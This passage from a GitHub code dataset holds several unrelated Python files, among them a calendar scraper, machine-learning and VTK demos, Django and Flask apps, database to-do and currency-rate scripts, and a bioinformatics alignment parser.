Hopefully it works\n event = {\n 'id':base64.b32hexencode(dict.get('event_title').encode(\"UTF-8\")).decode(\"UTF-8\").lower()[:-6],\n 'summary': 'CS Dept Event - '+ dict.get('event_date'),\n 'description': dict.get('event_title') + ',' + dict.get('event_link'),\n 'start': {\n 'dateTime': dict.get('event_date')+'T'+dict.get('start_time')+'-04:00',\n 'timeZone': 'Canada/Eastern',\n },\n 'end': {\n 'dateTime': dict.get('event_date')+'T'+dict.get('end_time')+'-04:00',\n 'timeZone': 'Canada/Eastern',\n },\n 'reminders': {\n 'useDefault': True,\n },\n }\n\n # Call the Calendar Insert API\n\n event = service.events().insert(calendarId=config.Cal_ID, body=event).execute()\n print('Event created: %s' % (event.get('htmlLink')))\n\n except HttpError as error:\n print('An error occurred: %s' % error)\n\n\n# To scrape the website and get the events\ndef scraper(creds):\n URL = \"https://www.uwindsor.ca/science/computerscience/event-calendar/month\"\n page = requests.get(URL)\n\n # print(page.text)\n soup = BeautifulSoup(page.content, \"html.parser\")\n\n # To add past events change class_=\"single-day past\"\n cal3 = soup.find_all(class_=\"single-day future\")\n\n dict = {\n 'event_title':'',\n 'event_date':'',\n 'event_link':'',\n 'event_time':'',\n 'start_time':'',\n 'end_time':''\n }\n\n for i in range (len(cal3)):\n event_title = cal3[i].find_all(class_=\"event-title\")\n event_link = cal3[i].find_all('a', href=True)\n event_time = cal3[i].find_all(class_=\"event-date\")\n for k in range(len(event_time)):\n event_time[k] = event_time[k].text.strip()\n\n for j in range(len(event_title)):\n dict.update({'event_title': event_title[j].text.strip()})\n dict.update({'event_date': cal3[i][\"data-date\"]})\n dict.update({'event_link':\"www.uwindsor.ca\"+ event_link[j]['href']})\n dict.update({'event_time': event_time[j]})\n\n start_time = event_time[j][:event_time[j].find(' ')]\n end_time = event_time[j][event_time[j].rfind(' ')+1:]\n\n dict.update({'start_time': str(time_convert(start_time))})\n dict.update({'end_time': str(time_convert(end_time))})\n \n inserter(dict,creds)\n\n\ndef main():\n creds = None\n # The file token.json stores the user's access and refresh tokens, and is\n # created automatically when the authorization flow completes for the first\n # time.\n if os.path.exists('token.json'):\n creds = Credentials.from_authorized_user_file('token.json', SCOPES)\n # If there are no (valid) credentials available, let the user log in.\n if not creds or not creds.valid:\n if creds and creds.expired and creds.refresh_token:\n creds.refresh(Request())\n else:\n flow = InstalledAppFlow.from_client_secrets_file(\n 'credentials.json', SCOPES)\n creds = flow.run_local_server(port=0)\n # Save the credentials for the next run\n with open('token.json', 'w') as token:\n token.write(creds.to_json())\n\n try:\n page_token = None\n # service = build('calendar', 'v3', credentials=creds)\n # calendar_list = service.calendarList().list(pageToken=page_token).execute()\n # for calendar_list_entry in calendar_list['items']:\n # print(calendar_list_entry['summary'])\n scraper(creds)\n\n\n except HttpError as error:\n print('An error occurred: %s' % error)\n\n\n\n\nif __name__ == '__main__':\n main()","repo_name":"rajdedhia10/UWinCalScraper","sub_path":"Scraper.py","file_name":"Scraper.py","file_ext":"py","file_size_in_byte":4754,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"20841508492","text":"# モデルclfを使って訓練データで学習する\nfrom sklearn import datasets\nfrom 
sklearn import svm\n\n\niris = datasets.load_iris() # load the iris dataset\nX = iris.data # data\nY = iris.target # target\nn_train = len(X) // 2 # half the number of samples\nX_train, X_test = X[:n_train], X[n_train:] # training / test data\n\"\"\"\nThe cause of the low accuracy is in the training data made by\nn_train = len(X) // 2 and\nX_train, X_test = X[:n_train], X[n_train:]:\nthe data for the three iris species is split in two, with the first half used\nfor training and the second half for testing, so the training data contains\nno virginica samples at all\n\"\"\"\nY_train, Y_test = Y[:n_train], Y[n_train:] # training / test targets\nclf = svm.SVC() # create the model\nclf.fit(X_train, Y_train) # train it\nprint(clf.score(X_test, Y_test))\n","repo_name":"natume5/rensyuuyou","sub_path":"python3 Guide note Sample/chapter16/Section16-3/モデルclfを使って訓練データで学習する.py","file_name":"モデルclfを使って訓練データで学習する.py","file_ext":"py","file_size_in_byte":890,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"9030011799","text":"#!/usr/bin/env python\n\n##\n# This is an example of how to use the vtkVolumePicker.\n##\n\nimport math\nimport vtk\nfrom vtk.util.misc import vtkGetDataRoot\nVTK_DATA_ROOT = vtkGetDataRoot()\n\n#---------------------------------------------------------\n# renderer and interactor\nren = vtk.vtkRenderer()\nrenWin = vtk.vtkRenderWindow()\nrenWin.AddRenderer(ren)\niren = vtk.vtkRenderWindowInteractor()\niren.SetRenderWindow(renWin)\n\n#---------------------------------------------------------\n# read the volume\nreader = vtk.vtkImageReader2()\nreader.SetDataExtent(0,63,0,63,0,92)\nreader.SetFileNameSliceOffset(1)\nreader.SetDataScalarTypeToUnsignedShort()\nreader.SetDataByteOrderToLittleEndian()\nreader.SetFilePrefix(str(VTK_DATA_ROOT) + \"/Data/headsq/quarter\")\nreader.SetDataSpacing(3.2,3.2,1.5)\n\n#---------------------------------------------------------\n# set up the volume rendering\nvolumeMapper = vtk.vtkVolumeTextureMapper3D()\nvolumeMapper.SetInputConnection(reader.GetOutputPort())\nvolumeMapper.CroppingOn()\nvolumeMapper.SetCroppingRegionPlanes((0.0, 141.6, 0.0, 201.6, 0.0, 138.0))\n\nvolumeColor = vtk.vtkColorTransferFunction()\nvolumeColor.AddRGBPoint(0,0.0,0.0,0.0)\nvolumeColor.AddRGBPoint(180,0.3,0.1,0.2)\nvolumeColor.AddRGBPoint(1000,1.0,0.7,0.6)\nvolumeColor.AddRGBPoint(2000,1.0,1.0,0.9)\n\nvolumeScalarOpacity = vtk.vtkPiecewiseFunction()\nvolumeScalarOpacity.AddPoint(0,0.0)\nvolumeScalarOpacity.AddPoint(180,0.0)\nvolumeScalarOpacity.AddPoint(1000,0.2)\nvolumeScalarOpacity.AddPoint(2000,0.8)\n\nvolumeGradientOpacity = vtk.vtkPiecewiseFunction()\nvolumeGradientOpacity.AddPoint(0,0.0)\nvolumeGradientOpacity.AddPoint(90,0.5)\nvolumeGradientOpacity.AddPoint(100,1.0)\n\nvolumeProperty = vtk.vtkVolumeProperty()\nvolumeProperty.SetColor(volumeColor)\nvolumeProperty.SetScalarOpacity(volumeScalarOpacity)\nvolumeProperty.SetGradientOpacity(volumeGradientOpacity)\nvolumeProperty.SetInterpolationTypeToLinear()\nvolumeProperty.ShadeOff()\nvolumeProperty.SetAmbient(0.6)\nvolumeProperty.SetDiffuse(0.6)\nvolumeProperty.SetSpecular(0.1)\n\nvolume = vtk.vtkVolume()\nvolume.SetMapper(volumeMapper)\nvolume.SetProperty(volumeProperty)\n\n#---------------------------------------------------------\n# Do the surface rendering\nboneExtractor = vtk.vtkMarchingCubes()\nboneExtractor.SetInputConnection(reader.GetOutputPort())\nboneExtractor.SetValue(0,1150)\n\nboneNormals = vtk.vtkPolyDataNormals()\nboneNormals.SetInputConnection(boneExtractor.GetOutputPort())\nboneNormals.SetFeatureAngle(60.0)\n\nboneStripper = vtk.vtkStripper()\nboneStripper.SetInputConnection(boneNormals.GetOutputPort())\n\nboneLocator = 
vtk.vtkCellLocator()\nboneLocator.SetDataSet(boneExtractor.GetOutput())\nboneLocator.LazyEvaluationOn()\n\nboneMapper = vtk.vtkPolyDataMapper()\nboneMapper.SetInputConnection(boneStripper.GetOutputPort())\nboneMapper.ScalarVisibilityOff()\n\nboneProperty = vtk.vtkProperty()\nboneProperty.SetColor(1.0,1.0,0.9)\n\nbone = vtk.vtkActor()\nbone.SetMapper(boneMapper)\nbone.SetProperty(boneProperty)\n\n#---------------------------------------------------------\n# Create an image actor\ntable = vtk.vtkLookupTable()\ntable.SetRange(0,2000)\ntable.SetRampToLinear()\ntable.SetValueRange(0,1)\ntable.SetHueRange(0,0)\ntable.SetSaturationRange(0,0)\n\nmapToColors = vtk.vtkImageMapToColors()\nmapToColors.SetInputConnection(reader.GetOutputPort())\nmapToColors.SetLookupTable(table)\nmapToColors.Update()\n\nimageActor = vtk.vtkImageActor()\nimageActor.GetMapper().SetInputConnection(mapToColors.GetOutputPort())\nimageActor.SetDisplayExtent(32,32,0,63,0,92)\n\n#---------------------------------------------------------\n# make a transform and some clipping planes\ntransform = vtk.vtkTransform()\ntransform.RotateWXYZ(-20,0.0,-0.7,0.7)\n\nvolume.SetUserTransform(transform)\nbone.SetUserTransform(transform)\nimageActor.SetUserTransform(transform)\n\nc = volume.GetCenter()\n\nvolumeClip = vtk.vtkPlane()\nvolumeClip.SetNormal(0,1,0)\nvolumeClip.SetOrigin(c[0],c[1],c[2])\n\nboneClip = vtk.vtkPlane()\nboneClip.SetNormal(1,0,0)\nboneClip.SetOrigin(c[0],c[1],c[2])\n\nvolumeMapper.AddClippingPlane(volumeClip)\nboneMapper.AddClippingPlane(boneClip)\n\n#---------------------------------------------------------\nren.AddViewProp(volume)\nren.AddViewProp(bone)\nren.AddViewProp(imageActor)\n\ncamera = ren.GetActiveCamera()\ncamera.SetFocalPoint(c[0],c[1],c[2])\ncamera.SetPosition(c[0] + 500,c[1] - 100,c[2] - 100)\ncamera.SetViewUp(0,0,-1)\n\nrenWin.Render()\n\n#---------------------------------------------------------\n# the cone points along the -x axis\nconeSource = vtk.vtkConeSource()\nconeSource.CappingOn()\nconeSource.SetHeight(12)\nconeSource.SetRadius(5)\nconeSource.SetResolution(31)\nconeSource.SetCenter(6,0,0)\nconeSource.SetDirection(-1,0,0)\n\nconeMapper = vtk.vtkDataSetMapper()\nconeMapper.SetInputConnection(coneSource.GetOutputPort())\n\nredCone = vtk.vtkActor()\nredCone.PickableOff()\nredCone.SetMapper(coneMapper)\nredCone.GetProperty().SetColor(1,0,0)\n\ngreenCone = vtk.vtkActor()\ngreenCone.PickableOff()\ngreenCone.SetMapper(coneMapper)\ngreenCone.GetProperty().SetColor(0,1,0)\n\n# Add the two cones (or just one, if you want)\nren.AddViewProp(redCone)\nren.AddViewProp(greenCone)\n\n#---------------------------------------------------------\n# the picker\npicker = vtk.vtkVolumePicker()\npicker.SetTolerance(1e-6)\npicker.SetVolumeOpacityIsovalue(0.1)\n# locator is optional, but improves performance for large polydata\npicker.AddLocator(boneLocator)\n\n# A function to point an actor along a vector\ndef PointCone(actor,nx,ny,nz):\n actor.SetOrientation(0.0, 0.0, 0.0)\n n = math.sqrt(nx**2 + ny**2 + nz**2)\n if (nx < 0.0):\n actor.RotateWXYZ(180, 0, 1, 0)\n n = -n\n actor.RotateWXYZ(180, (nx+n)*0.5, ny*0.5, nz*0.5)\n\n# A function to move the cursor with the mouse\ndef MoveCursor(iren,event=\"\"):\n renWin.HideCursor()\n x,y = iren.GetEventPosition()\n picker.Pick(x, y, 0, ren)\n p = picker.GetPickPosition()\n n = picker.GetPickNormal()\n redCone.SetPosition(p[0],p[1],p[2])\n PointCone(redCone,n[0],n[1],n[2])\n greenCone.SetPosition(p[0],p[1],p[2])\n PointCone(greenCone,-n[0],-n[1],-n[2])\n 
iren.Render()\n\n#---------------------------------------------------------\n# custom interaction\niren.AddObserver(\"MouseMoveEvent\", MoveCursor)\n\niren.Start()\n","repo_name":"HopeFOAM/HopeFOAM","sub_path":"ThirdParty-0.1/ParaView-5.0.1/VTK/Examples/VolumeRendering/Python/VolumePicker.py","file_name":"VolumePicker.py","file_ext":"py","file_size_in_byte":6178,"program_lang":"python","lang":"en","doc_type":"code","stars":78,"dataset":"github-code","pt":"72"} +{"seq_id":"31641861366","text":"from django.core.mail import send_mail\nfrom django.http import HttpResponseRedirect\nfrom django.shortcuts import render, get_object_or_404\nfrom django.urls import reverse\n\nimport settings\nfrom mainapp.forms import MailForm\nfrom mainapp.models import Products, Abonements, Favorite\n\n\ndef index(request):\n if request.method == 'POST':\n form = MailForm(request.POST)\n if form.is_valid():\n form = form.save(commit=False)\n messages = f'Абонемент {form.name} \\nФИ: {form.full_name} ({form.email})\\nТелефон: {form.tel}'\n res = send_mail(settings.EMAIL_TITLE, messages, settings.EMAIL_HOST_USER, ['pasha3232@inbox.ru'])\n if res:\n form.save()\n return HttpResponseRedirect(reverse('mainapp:index'))\n else:\n form = MailForm()\n context = {\n 'form': form,\n }\n return render(request, 'mainapp/index.html', context)\n\n\ndef tovari(request):\n products = Products.objects.all()\n context = {\n 'title': 'Каталог',\n 'products': products,\n }\n return render(request, 'mainapp/tovari.html', context)\n\n\ndef catalog(request):\n products = Products.objects.filter(counts__gt=0)\n context = {\n 'title': 'Каталог',\n 'products': products,\n\n }\n return render(request, 'mainapp/tovari.html', context)\n\n\ndef abonements(request):\n abonements = Abonements.objects.all()\n context = {\n 'title': 'Абонементы',\n 'abonements': abonements,\n }\n return render(request, 'mainapp/abonements.html', context)\n\n\ndef favorite(request):\n favor = Favorite.objects.filter(user=request.user)\n context = {\n 'title': 'избранное',\n 'favorite': favor,\n }\n return render(request, 'mainapp/favorite.html', context)\n\n\ndef add_favorite(request, pk):\n news = get_object_or_404(Products, id=pk)\n\n Favorite.objects.get_or_create(\n news=news,\n user=request.user\n )\n return HttpResponseRedirect(reverse('mainapp:index'))\n\n\ndef remove_favorite(request, pk):\n favor = get_object_or_404(Favorite, id=pk)\n favor.delete()\n return HttpResponseRedirect(reverse('mainapp:favorite'))\n\n\n","repo_name":"Pavlik1122/Sport-club-NIRVANA","sub_path":"mainapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2211,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"70695001834","text":"import sqlite3\nfrom employee import Employee\n\n# This method creates the file if it does not exist\n# if it exists then it just connects\nconn = sqlite3.connect('employee.db')\n\n# create a curson\nc = conn.cursor()\n\n# create an employee table\n# Need to run this only once\n# c.execute(\"\"\"CREATE TABLE employees(\n# \t\tfirst text,\n# \t\tlast text,\n# \t\tpay integer\n# \t\t)\"\"\")\n\nemp_1 = Employee(\"John\",\"Doe\",80000)\nemp_2 = Employee(\"Jane\",\"Doe\",90000)\n\n\n\n# insert\n# c.execute(\"INSERT INTO employees VALUES ('Corey','Shafer',50000)\")\n# c.execute(\"INSERT INTO employees VALUES ('Mary','Shafer',70000)\")\n\n# first proper way\n# c.execute(\"INSERT INTO employees VALUES (?,?,?)\", (emp_1.first, emp_1.last, emp_1.pay))\n\n# commits the current transaction\n# 
conn.commit()\n\n# second proper way\n# c.execute(\"INSERT INTO employees VALUES (:first,:last,:pay)\", {'first':emp_2.first, 'last':emp_2.last, 'pay':emp_2.pay})\n\n# commits the current transaction\n# conn.commit()\n\n# select\n# first approach\nc.execute(\"SELECT * FROM employees WHERE last=?\", ('Shafer',))\n\nprint(c.fetchall())\n\n# second approach\nc.execute(\"SELECT * FROM employees WHERE last=:last\", {'last':'Doe'})\n\nprint(c.fetchall())\n\n# commits the current transaction\nconn.commit()\n\n# close the connection\nconn.close()","repo_name":"tjkhara/notes","sub_path":"python/courses/corey_shafer/sqllite/sqlite_demo.py","file_name":"sqlite_demo.py","file_ext":"py","file_size_in_byte":1249,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"72965869353","text":"from sqlalchemy.ext.declarative import declarative_base\nfrom sqlalchemy import create_engine, Column, Integer, String, Date\nfrom datetime import datetime, timedelta\nfrom sqlalchemy.orm import sessionmaker\n\n\nBase = declarative_base()\ntoday = datetime.now().date()\n\n\nclass Task(Base):\n __tablename__ = 'task'\n\n id = Column(Integer, primary_key=True)\n task = Column(String)\n deadline = Column(Date, default=today)\n\n def __repr__(self):\n return self.task\n\n\ndef print_day_tasks(day, day_name=\"\"):\n if not day_name:\n day_name = day.strftime(\"%A\")\n\n print(f\"{day_name} {day.strftime('%d %b')}:\")\n\n rows = session.query(Task).filter(Task.deadline == day).all()\n for i, row in enumerate(rows):\n print(f\"{i}. {row}\")\n else:\n if not rows:\n print(\"Nothing to do!\")\n print()\n\n\ndef print_weeks_tasks():\n for i in range(7):\n cur_day = today + timedelta(days=i)\n print_day_tasks(cur_day)\n\n\ndef print_all_tasks():\n print(\"All tasks:\")\n\n rows = session.query(Task).order_by(Task.deadline)\n for i, row in enumerate(rows):\n print(f\"{i}. {row.task}. {row.deadline.strftime('%d %b')}\")\n\n\ndef print_missed_tasks():\n print(\"Missed tasks:\")\n\n rows = session.query(Task).filter(Task.deadline < today).order_by(Task.deadline)\n for i, row in enumerate(rows):\n print(f\"{i}. {row.task}. {row.deadline.strftime('%d %b')}\")\n else:\n if not rows:\n print(\"Nothing is missed!\")\n print()\n\n\ndef add_new_task():\n task_name = input(\"Enter task\\n\")\n deadline_str = input(\"Enter deadline\\n\")\n deadline_date = datetime.strptime(deadline_str, \"%Y-%m-%d\")\n\n new_row = Task(task=task_name, deadline=deadline_date)\n session.add(new_row)\n session.commit()\n\n print(\"The task has been added!\\n\")\n\n\ndef delete_task():\n print(\"Chose the number of the task you want to delete:\")\n\n rows = session.query(Task).order_by(Task.deadline)\n for i, row in enumerate(rows):\n print(f\"{i}. {row.task}. 
{row.deadline.strftime('%d %b')}\")\n\n    num_del = int(input())\n    session.delete(rows[num_del])\n    session.commit()\n\n    print(\"The task has been deleted!\\n\")\n\n\nengine = create_engine('sqlite:///todo.db?check_same_thread=False')\nBase.metadata.create_all(engine)\n\nSession = sessionmaker(bind=engine)\nsession = Session()\n\n\nwhile True:\n    print(\"1) Today's tasks\\n\"\n          \"2) Week's tasks\\n\"\n          \"3) All tasks\\n\"\n          \"4) Missed tasks\\n\"\n          \"5) Add task\\n\"\n          \"6) Delete task\\n\"\n          \"0) Exit\")\n    user_input = input()\n    print()\n\n    if user_input == \"1\":\n        print_day_tasks(today, \"Today\")\n    elif user_input == \"2\":\n        print_weeks_tasks()\n    elif user_input == \"3\":\n        print_all_tasks()\n    elif user_input == \"4\":\n        print_missed_tasks()\n    elif user_input == \"5\":\n        add_new_task()\n    elif user_input == \"6\":\n        delete_task()\n\n    else:\n        print(\"Bye!\")\n        break\n","repo_name":"BuyankinM/JetBrainsAcademyProjects","sub_path":"To-Do List/To-Do List/task/todolist/todolist.py","file_name":"todolist.py","file_ext":"py","file_size_in_byte":2975,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"44618859745","text":"import mysql.connector\nimport requests\n\nclass waluta:\n    nazwa=\"\"\n    kurs=\"\"\n    def __init__(self,nazwa_arg,kurs_arg):\n        self.nazwa=nazwa_arg\n        self.kurs=kurs_arg\n    def dane(self):\n        print(self.nazwa, self.kurs)\n\nclass tab_waluty:\n    numer=\"\"\n    data=\"\"\n    def __init__(self,numer_arg,data_arg):\n        self.numer=numer_arg\n        self.data=data_arg\n    def dane(self):\n        print(self.numer, self.data)\n\ndef wybrane(tablica,nazwa):\n    # print(tablica)\n    query = \"INSERT INTO \"+nazwa+\" VALUES (NULL,'\"+xml.numer+\"','\"+xml.data+\"',\"+tablica[0].kurs+\");\"\n    print(query)\n    kursor.execute(query)\n\n\npath = 'http://api.nbp.pl/api/exchangerates/tables/A?format=xml'\nr = requests.get(path)\n# data\nwith open('dane.xml', 'wb') as f:\n    f.write(r.content)\n\nfrom xml.etree import ElementTree\n\ntree = ElementTree.parse(\"dane.xml\")\nroot = tree.getroot()\n\ntabela = []\nfor element in root.findall(\".//Rate\"):\n    nazwa = element.find('Code').text\n    kurs = element.find('Mid').text\n    wal = waluta(nazwa,kurs)\n    tabela.append(wal)\n# print(tabela)\n\n# table number and date\nfor element in root.findall('ExchangeRatesTable'):\n    nr_tabeli = element.find('No').text\n    data = element.find('EffectiveDate').text\n    xml = tab_waluty(nr_tabeli,data)\n# print(nr_tabeli)\n# print(data)\n\n# check the data so that entries are not duplicated\n\nbaza = mysql.connector.connect(host='localhost', user='root', password='', database='waluty')\nkursor = baza.cursor()\nquery = \"SELECT nr_tabeli,id_wiersza FROM kursy GROUP BY id_wiersza ORDER BY id_wiersza desc LIMIT 1;\"\nkursor.execute(query)\nnr_tabeli_w_bazie = str(kursor.fetchall()).replace(\"'\", \"\").replace(\")\", \"\").replace(\"(\", \"\").replace(\"[\", \"\").replace(\"]\", \"\").split(\",\")[0]\n# print(nr_tabeli_w_bazie)\nbaza.commit()\nerror = 0\nif nr_tabeli_w_bazie == xml.numer:\n    error = 1\n    print(\"Dane w bazie są aktualne!\")\n\n# send the rates for all currencies to the database\nif error == 0:\n    print('Zapytania do tabeli \"kursy\"')\n    for i in tabela:\n        baza = mysql.connector.connect(host='localhost', user='root', password='', database='waluty')\n        kursor = baza.cursor()\n        query = \"INSERT INTO kursy VALUES (NULL,'\"+xml.numer+\"','\"+xml.data+\"','\"+i.nazwa+\"',\"+i.kurs+\");\"\n        kursor.execute(query)\n        baza.commit()\n        print(query)\n    print(80*'-')\n\n# pick out the selected currencies and send them to the database\nif error == 0:\n    GBP = []\n    USD = []\n    EUR = []\n    for i in tabela:\n        if i.nazwa == 'USD':\n            USD.append(i)\n            continue\n        if i.nazwa == 'GBP':\n            GBP.append(i)\n            continue\n        if i.nazwa == 'EUR':\n            EUR.append(i)\n            continue\n    # print(GBP)\n    # print(USD)\n    # print(EUR)\n    print('Zapytania do tabel z wybranymi walutami')\n    baza = mysql.connector.connect(host='localhost', user='root', password='', database='waluty')\n    kursor = baza.cursor()\n    wybrane(GBP,'gbp')\n    wybrane(USD, 'usd')\n    wybrane(EUR, 'eur')\n    baza.commit()\n    print(80 * '-')\n\n    print(\"Dane zostały wysłane do bazy danych!\")\n#print(tabela)","repo_name":"rauser17/walutyswiata","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3070,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"20942203262","text":"import fileinput\n\n# parse the GAF record and count how many reads\n# in each profile (mapping quality x perfect alignment x alignment score)\n# mapping quality: number. '-1' for unmapped reads\n# perfect: boolean to specify if the reads aligned perfectly\n# alignment score: value of the AS tag\n\n# to tally the number of reads/records in each profile\nrecords = {}\n\nfor line in fileinput.input():\n    line = line.rstrip().split('\\t')\n    ## handle unmapped reads\n    if line[9] == \"*\":\n        line[11] = '-1'\n    ## extract AS tag\n    as_tag = False\n    for ii in range(11, len(line)):\n        tag = line[ii].split(':')\n        if tag[0] == 'AS':\n            as_tag = tag[2]\n            break\n    ## check if perfectly aligned\n    perfect = False\n    if line[9] != \"*\" and line[9] == line[10]:\n        perfect = True\n    ## increment records\n    rid = '{}\\t{}\\t{}'.format(line[11], perfect, as_tag)\n    if rid not in records:\n        records[rid] = 1\n    else:\n        records[rid] += 1\n\n# print the counts for each rid/profiles\nfor rec in records.keys():\n    print('{}\\t{}'.format(records[rec], rec))\n","repo_name":"ComparativeGenomicsToolkit/cactus","sub_path":"doc/mc-paper/hprc/resources/compute_mapping_stats_gaf.py","file_name":"compute_mapping_stats_gaf.py","file_ext":"py","file_size_in_byte":1107,"program_lang":"python","lang":"en","doc_type":"code","stars":426,"dataset":"github-code","pt":"72"} +{"seq_id":"23112414656","text":"import os\nimport base64\nfrom io import BytesIO\nfrom flask import Flask, request, jsonify\nimport torch\nfrom transformers import GPT2Tokenizer\nfrom PIL import Image\nfrom model import GPT2DecoderWithImageFeatures\nfrom transformers import ViTModel\nimport numpy as np\nfrom utils import special_tokens_dict\nfrom generate import generate_code\nimport requests\n\napp = Flask(__name__)\n\n# Load the tokenizer, ViT model, and decoder\ntokenizer = GPT2Tokenizer.from_pretrained('gpt2')\ntokenizer.add_special_tokens(special_tokens_dict)\nvit_model = ViTModel.from_pretrained('google/vit-base-patch16-224').base_model\ndevice = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\nvit_model.to(device)\n\ndecoder = GPT2DecoderWithImageFeatures(input_size=768)\n# Update the GPT2 model with the new tokenizer\ndecoder.gpt.resize_token_embeddings(len(tokenizer))\n\ndecoder.load_state_dict(torch.load(\"best_decoder.pth\", map_location=device))\ndecoder.to(device)\n\n# Add this method to save the received image\ndef save_image(image_data):\n    img_data = base64.b64decode(image_data)\n    img = Image.open(BytesIO(img_data))\n    image_path = \"received_image.png\"\n    img.save(image_path)\n    return image_path\n\n\n@app.route('/generate_code', methods=['POST'])\ndef generate_code_endpoint():\n    api_key = request.json['api_key']\n    
image_data = request.json['image_data']\n prompt = request.json['prompt']\n\n image_path = save_image(image_data)\n print(image_path)\n generated_code = generate_code(image_path, tokenizer, vit_model, decoder)\n print(generated_code)\n response_text = call_gpt3(api_key, generated_code,prompt)\n print(response_text)\n return jsonify({\"generated_html\": response_text})\n\n\ndef call_gpt3(api_key, generated_code, prompt=\"for an online shop\"):\n system_prompt = \"You are a useful assistant that helping people to design website, do not include any additional information in answer.\"\n user_prompt = f'''\nPlease generate the proper content for `...` based on the purpose of the site, style the HTML using Tailwind CSS framework, the purpose of the site is for {prompt}\n\nDSL-to-HTML mapping:\nheader ->
...
\nbtn-inactive -> \n\nDSL code:\n{generated_code}\n\nOutput the minified HTML and CSS code!\n''' \n print(user_prompt)\n chat_gpt_request = get_configured_chat_gpt_request([\n {\n \"role\": \"system\",\n \"content\": system_prompt\n },\n {\"role\": \"user\", \"content\": user_prompt},\n ])\n\n headers = {\n \"Content-Type\": \"application/json\",\n \"Authorization\": f\"Bearer {api_key}\"\n }\n\n try:\n response = requests.post(\n \"https://api.openai.com/v1/chat/completions\", json=chat_gpt_request, headers=headers)\n result = response.json()\n print(result)\n return result['choices'][0]['message']['content']\n except Exception as error:\n print(f\"Error: {error}\")\n return None\n\n\ndef get_configured_chat_gpt_request(messages):\n return {\n \"messages\": messages,\n \"max_tokens\": 3000,\n \"model\": \"gpt-4\",\n }\n\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0', port=os.environ.get('PORT', 8080), debug=True)\n","repo_name":"mzbac/image2dsl","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3450,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"37591872274","text":"# **************************************************************************\n# *\n# * Authors: Carlos Oscar Sorzano (coss@cnb.csic.es)\n# *\n# * Unidad de Bioinformatica of Centro Nacional de Biotecnologia , CSIC\n# *\n# * This program is free software; you can redistribute it and/or modify\n# * it under the terms of the GNU General Public License as published by\n# * the Free Software Foundation; either version 2 of the License, or\n# * (at your option) any later version.\n# *\n# * This program is distributed in the hope that it will be useful,\n# * but WITHOUT ANY WARRANTY; without even the implied warranty of\n# * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# * GNU General Public License for more details.\n# *\n# * You should have received a copy of the GNU General Public License\n# * along with this program; if not, write to the Free Software\n# * Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA\n# * 02111-1307 USA\n# *\n# * All comments concerning this program package may be sent to the\n# * e-mail address 'coss@cnb.csic.es'\n# *\n# **************************************************************************\n\"\"\"\nConsensus picking protocol\n\"\"\"\nimport os\nfrom math import sqrt\n\nimport pyworkflow.protocol.params as params\nfrom pyworkflow.em.protocol.protocol_particles import ProtParticlePicking\nfrom pyworkflow.protocol.constants import *\nfrom pyworkflow.em.data import Coordinate\n\nimport numpy as np\n\n\nclass XmippProtConsensusPicking(ProtParticlePicking):\n \"\"\"\n Protocol to estimate the agreement between different particle picking algorithms. The protocol\n takes several Sets of Coordinates calculated by different programs and/or different parameter\n settings. Let's say we consider N independent pickings. Then, a coordinate is considered\n to be a correct particle if M pickers have selected the same particle (within a radius in\n pixels specified in the form).\n \n If you want to be very strict, then set M=N; that is, a coordinate represents a particle if\n it has been selected by all particles (this is the default behaviour). Then you may relax\n this condition by setting M=N-1, N-2, ...\n \n If you want to be very flexible, set M=1, in this way it suffices that 1 picker has\n selected the coordinate to be considered as a particle. 
Note that in this way, the cleaning\n of the dataset has to be performed by other means (screen particles, 2D and 3D \n classification, ...).\n \"\"\"\n _label = 'consensus picking'\n \n def __init__(self, **args):\n ProtParticlePicking.__init__(self, **args)\n self.stepsExecutionMode = STEPS_SERIAL\n\n def _defineParams(self, form):\n form.addSection(label='Input')\n form.addParam('inputCoordinates', params.MultiPointerParam, pointerClass='SetOfCoordinates',\n label=\"Input coordinates\",\n help='Select the set of coordinates to compare')\n form.addParam('consensusRadius',params.IntParam, default=10, label=\"Radius\",\n help=\"All coordinates within this radius (in pixels) are presumed to correspond to the same particle\")\n form.addParam('consensus',params.IntParam, default=-1, label=\"Consensus\", expertLevel=LEVEL_ADVANCED,\n help=\"How many times need a particle to be selected to be considered as a consensus particle. \"\\\n \"Set to -1 to indicate that it needs to be selected by all algorithms. Set to 1 to indicate that \"\\\n \"it suffices that only 1 algorithm selects the particle\")\n\n form.addParallelSection(threads=4, mpi=0)\n \n#--------------------------- INSERT steps functions -------------------------------------------- \n def _insertAllSteps(self):\n deps = []\n for micrograph in self.inputCoordinates[0].get().getMicrographs():\n stepId = self._insertFunctionStep(\"calculateConsensusStep\", \n micrograph.getObjId(), prerequisites=[])\n deps.append(stepId)\n self._insertFunctionStep(\"createOutputStep\", prerequisites=deps)\n \n def getInputMicrographs(self):\n return self.inputCoordinates[0].get().getMicrographs()\n \n def _summary(self):\n message = []\n for i, coordinates in enumerate(self.inputCoordinates):\n protocol = self.getMapper().getParent(coordinates.get())\n message.append(\"Method %d %s\" % (i+1, protocol.getClassLabel()))\n message.append(\"Radius = %d\" % self.consensusRadius)\n message.append(\"Consensus = %d\" % self.consensus)\n return message\n \n def _methods(self):\n return [] \n \n def calculateConsensusStep(self, micId):\n # Take the sampling rates\n Tm = []\n for coordinates in self.inputCoordinates:\n Tm.append(coordinates.get().getMicrographs().getSamplingRate())\n \n # Get all coordinates for this micrograph\n coords = []\n Ncoords = 0\n n=0\n for coordinates in self.inputCoordinates:\n coordArray = np.asarray([x.getPosition() \n for x in 